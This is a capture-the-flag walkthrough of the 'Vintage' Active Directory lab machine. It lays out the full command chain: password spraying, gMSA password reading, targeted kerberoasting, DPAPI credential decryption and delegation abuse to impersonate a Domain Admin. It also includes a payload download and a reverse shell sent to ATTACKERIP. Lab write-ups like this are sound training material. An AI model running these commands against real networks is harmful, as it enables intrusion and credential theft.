Vintage
(Hard , Windows)
OVERVIEW
As you can see we got an IP and this time we are given starting credential of a valid user so let’s first start the enumeration with NMAP
ENUMERATION
The scan looks normal so let’s use the given credential in each service but before that don’t forget to add the domain and domain controller name into the /etc/hosts file
Now let’s check the SMB service
So as you can see that NTLM authentication is disabled so normal SMB authentication wont work so we switched upon Kerberos authentication using -k flag and it succeeded so we can list shares using this authentication
NOTE: Do change you /etc/krb5.conf earlier to avoid any problem in future as we know that this machine will use Kerberos Authentications so update the below in your /etc/krb5.conf file
[libdefaults]
default_realm = VINTAGE.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
[realms]
VINTAGE.HTB = {
kdc = 10.129.231.205
admin_server = 10.129.231.205
}
[domain_realm]
.vintage.htb = VINTAGE.HTB
vintage.htb = VINTAGE.HTB
So I checked the shares above using impacket-smbclient but didn’t get anything useful so let’s do RID cycling to enumerate users , computers , groups etc
nxc smb 10.129.231.205 -u P.Rosa -p 'Rosaisbest123' -k --rid-brute
So we got all users and computer/machine accounts so let’s make a list of them and save it to users.txt file and for passwords we will not use $ for machine accounts as you can see below (pwd.txt)
gMSA01
dc01
fs01
administrator
guest
krbtgt
m.Rossi
r.Verdi
l.Bianchi
g.Viola
c.Neri
p.Rosa
svc_sql
svc_ldap
svc_ark
c.Neri_adm
l.Bianchi_adm
Now we have users list so we can bruteforce these users with their same username to see if anyone is using their username as their passwords
(NOTE: I already sprayed the Rosaisbest123 password on this list and didn’t got anything)
nxc smb 10.129.231.205 -u users.txt -p pwd.txt -k --no-bruteforce --continue-on-success
so we found that FS01$ uses its username as its password
Now this can also be founded using bloodhound
bloodhound-python -u P.Rosa -p Rosaisbest123 -d vintage.htb -ns 10.129.231.205 -c ALL --zip
You can see that the machine account FS01$ belongs/MemberOf PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB
So member of this group generally uses their usernames as their password so through that we can understand the above scenario
EXPLOITATION
Now we owned the FS01$ machine account let’s do the enumeration on bloodhound
As you can see FS01 being the member of Domain Computers can ReadGMSAPassword of GMSA01$@VINTAGE.HTB
So let’s use netexec to read GMSAPassword
nxc ldap 10.129.231.205 -u fs01$ -p fs01 -k --gmsa
We successfully got the NTLM Hash of the gMSA01$ machine account now let’s see again in bloodhound data
As you can see that GMSA01$ machine account has GenericWrite and AddSelf Permission on SERVICEMANAGERS@VINTAGE.HTB
So let’s add GMSA01$ account into SERVICEMANAGER group using bloodyAD
bloodyAD -d vintage.htb --host dc01.vintage.htb -u gmsa01$ -p "NTLM-HASH" -f rc4 -k add groupMember SERVICEMANAGERS 'gMSA01$'
You can easily do this by getting GMSA01$ TGT also then u don’t have to pass user and password hash or even format of the hash
Now we are added to SERVICEMANAGERS group let’s see what this group can do in bloodhound
As you can see SERVICEMANAGERS have GenericAll Write on three users and among three two of the users are enabled and one user svc_sql is disabled
Since SERVICEMANAGERS have GenericAll on these users we can enable this user and then kerberoast it
First let’s take gMSA01$ TGT to avoid future problems
getTGT.py vintage.htb/gMSA01$ -hashes :NTLM-HASH
export KRB5CCNAME=gMSA01$.ccache
Now let’s try removing the FALSE parameter from the svc_sql user using bloodyAD
bloodyAD -d vintage.htb --host dc01.vintage.htb -k remove uac 'svc_sql' -f ACCOUNTDISABLE
As you can see the account is successfully removed from the ACCOUNTDISABLE field now let’s target kerberoast it to get the hash of the three accounts
we will use targeted kerberoast attack
python3 targetedKerberoast.py -d vintage.htb -k --no-pass --dc-host dc01.vintage.htb
As you can see we get the svc_sql hash and other two hash too so let’s use john to crack these passwords
So as you can see we got the svc_sql password now let’s use this password to spray it on the usernames we got earlier maybe it could be reused somewhere
nxc smb 10.129.231.205 -k -u users.txt -p 'Zer0the0ne'
Here we go we got another user named as C.Neri let’s login it using evil-winrm as it is a member of Remote Management Users but since winrm normally uses NTLM authentication and this time it is disabled so let’s use the realm method so first grab C.Neri user TGT
getTGT.py vintage.htb/C.neri:'Zer0the0ne'
export KRB5CCNAME=C.neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb
NOTE: If you are getting KDC_REALM error do fix your /etc/krb5.conf file
USER FLAG
Now you can get your user flag
PRIVILEGE ESCALATION
Now Let’s start enumeration for escalating privileges so let’s see for stored credentials first as bloodhound didn’t show anything good for C.Neri user
cmdkey /list
It showed nothing because we need an Interactive session with a valid profile. The WinRM session is not an interactive session but rather a network logon
You can find a better explanation on Bitvise blog
So now we can use RunasCs tool to spawn an interactive session so let’s put it into the WinRM session so don’t forget to open a python server in the same directory as RunasCs tool then in WinRM shell do this
iwr http://YOUR-IP:PORT/RunasCs.exe -OutFile RunasCs.exe
.\RunasCs.exe C.Neri Zer0the0ne cmd.exe -r ATTACKERIP:PORT
On your listener you will get the interactive shell and then do the above cmdkey command again
As you can see the above stored credentials are of the user c.neri_adm so ,
We could use Invoke-WCMDump.ps1 to get the stored credentials but on transporting it from the system to shell is triggering the antivirus which is not allowing us to transfer the file into the shell So our second option is
To look for the Credential Encrypted Blob and DPAPI Master keys to generate a key that can decrypt the Credential blob and give us the plain text password
So we will go back to the evil-winrm shell terminal and then do this
cd C:/Users/C.Neri/appdata/roaming/Microsoft
gci -force
You will se two directories that are use of us
1) Credentials → It contains encrypted credential Blob which we need to download to crack it
2) Protect → It contains a SID directory which contain our master key which we needed to generate the key to crack the credentials
Now let’s go and download these files
cd C:/Users/C.Neri/appdata/roaming/Microsoft/Credentials
gci -force
You will get this Credential Blob so download it using
download C4BB96844A5C9DD45D5B6A9859252BA6
# it will show error but don't mind it let it be and then check where you started evil winrm session
# in that directory you will see your file when you do ls -la
You can match the file size yo ensure that you downloaded the file completely or not
Similarly download master keys too
cd C:/Users/C.Neri/appdata/roaming/Microsoft/Protect/S-1-5-21-4024337825-2033394866-2055507597-1115/
#(your SID directory may be different so go to that don't just copy)
gci -force
# Now download both master keys
download 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
After you downloaded all three things let’s go to the directory where these files are downloaded and now we will use Impacket dpapi.py script to generate key using master keys and then will decrypt credential blob So let’s go
dpapi.py masterkey -file 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -sid S-1-5-21-4024337825-2033394866-2055507597-1115
#Enter the password -> Zer0the0ne
After this you will get a decrypt key copy that key and do this
dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 'YOUR-KEY'
If you face this Padding Error this means that this is not the master key we needed so then let’s try other one now
Follow above steps and change the file of master key above and get the new decrypt key and copy it and then again
dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 'YOUR-KEY'
Here we go we got the C.Neri_adm user credentials now let’s see what this user can do in bloodhound
So We can see that C.NERI_ADM has GenericWrite and AddSelf rights on DelegatedAdmins group and
L.Bianchi_adm is a member of DelegatedAdmins and also a Domain Admin so we can do RBCD (Resource Based Constrained Delegation) on it by adding a account which has SPN enabled which in this case is FS01$ machine account and then we can impersonate DC / Domain Admins
So let’s do it
First we have to add C.Neri_adm into DelegatedAdmins group so that we can add FS01$ account into this group also
(Don’t forget to take the TGT for C.Neri_adm user)
bloodyAD -d vintage.htb --host dc01.vintage.htb -k add groupMember DELEGATEDADMINS 'C.neri_adm'
Now let’s add FS01$ machine account to DELEGATEDADMINS
bloodyAD -d vintage.htb --host dc01.vintage.htb -k add groupMember DELEGATEDADMINS 'fs01$'
Now take FS01$ TGT and export it
After it successfully added then we can start our impersonation of DC/Domain Admins But
We cannot impersonate the Administrator account, as it is restricted from network logins. The L.BIANCHI_ADM user account is also a member of Domain Admins So we can impersonate that user to perform the Delegation attack then get the ticket with an ALT SPN of HTTP and get a WinRM session as WinRM uses HTTP class rather then CIFS
So let’s impersonate either DC or directly L.Bianchi_adm user as it is the faster approach
getST.py -spn 'cifs/dc01.vintage.htb' -altservice 'HTTP/dc01.vintage.htb' -impersonate 'l.bianchi_adm' -k -no-pass -dc-ip 10.129.231.205 vintage.htb/fs01$
ROOT FLAG
export KRB5CCNAME=l.bianchi_adm@HTTP_dc01.vintage.htb@VINTAGE.HTB.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb
We successfully got in , now you can grab the root flag
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!
For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!
